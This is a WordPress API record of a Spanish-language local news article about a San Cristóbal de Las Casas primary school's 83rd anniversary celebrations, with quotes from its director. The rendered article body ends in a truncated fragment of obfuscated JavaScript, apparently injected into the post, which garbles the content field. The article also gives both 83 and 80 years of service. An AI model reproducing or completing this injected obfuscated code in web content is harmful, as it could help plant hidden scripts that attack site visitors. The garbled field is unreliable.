{"id":14561,"date":"2024-03-08T01:38:18","date_gmt":"2024-03-08T01:38:18","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=14561"},"modified":"2024-03-08T01:38:18","modified_gmt":"2024-03-08T01:38:18","slug":"cumple-83-anos-la-escuela-primaria-angel-albino-corzo-castillejos","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=14561","title":{"rendered":"Cumple 83 a\u00f1os la Escuela Primaria &#8220;Angel Albino Corzo Castillejos&#8221;"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"778\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/IMG-20240307-WA0019-1024x778.jpg\" alt=\"\" class=\"wp-image-14562\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/IMG-20240307-WA0019-1024x778.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/IMG-20240307-WA0019-300x228.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/IMG-20240307-WA0019-768x584.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/IMG-20240307-WA0019.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal San Crist\u00f3bal de Las Casas.- En conmemoraci\u00f3n del 83 aniversario de la fundaci\u00f3n de la Escuela Primaria del Estado &#8220;Angel Albino Corzo Castillejos&#8221; de esta ciudad se llevaron a cabo una serie de actividades tanto dentro como fuera del plantel educativo. El director de la instituci\u00f3n, Jorge Teo Mart\u00ednez G\u00f3mez, comparti\u00f3 detalles sobre las festividades que marcaron esta significativa ocasi\u00f3n.Durante una entrevista, el director Mart\u00ednez G\u00f3mez se\u00f1al\u00f3 que las actividades se desplegaron a lo largo de la semana con un enfoque tanto pedag\u00f3gico como social en la ciudad. &#8220;Las actividades abarcaron espacios tanto dentro como fuera de la instituci\u00f3n. Una de las iniciativas m\u00e1s destacadas tuvo lugar en el Museo de San Crist\u00f3bal (Musac), donde se exhibieron proyectos desarrollados por los estudiantes de nuestra escuela&#8221;.La culminaci\u00f3n de las festividades tuvo lugar dentro de la escuela con un programa c\u00edvico cultural que reuni\u00f3 a estudiantes, personal docente y miembros destacados de la comunidad educativa.En esta ocasi\u00f3n tan especial, la Escuela Primaria &#8220;Angel Albino Corzo Castillejos&#8221; tuvo el honor de contar con la presencia de autoridades del Ayuntamiento y directivos del Musac. Mart\u00ednez G\u00f3mez destac\u00f3 la trayectoria hist\u00f3rica de la escuela, mencionando sus 80 a\u00f1os de servicio educativo y su contribuci\u00f3n al desarrollo profesional de numerosos egresados que han destacado en diversas \u00e1reas profesionales.&#8221;Esta escuela es una de las m\u00e1s antiguas de la ciudad, ha tenido diferentes direcciones a lo largo de su historia, y estamos orgullosos de la trayectoria que hemos construido. Nuestros alumnos egresados son profesionales destacados que han dejado una marca significativa en la comunidad&#8221;, afirm\u00f3 Mart\u00ednez G\u00f3mez.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal San Crist\u00f3bal de Las Casas.- En conmemoraci\u00f3n del 83 aniversario de la fundaci\u00f3n de la Escuela Primaria del Estado &#8220;Angel Albino Corzo Castillejos&#8221; de esta ciudad se llevaron a cabo una serie de actividades tanto dentro como fuera del plantel educativo. El director de la instituci\u00f3n, Jorge Teo Mart\u00ednez G\u00f3mez, comparti\u00f3 detalles &hellip;<\/p>\n","protected":false},"author":2,"featured_media":14562,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-14561","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14561","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=14561"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14561\/revisions"}],"predecessor-version":[{"id":14563,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14561\/revisions\/14563"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/14562"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=14561"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=14561"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=14561"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}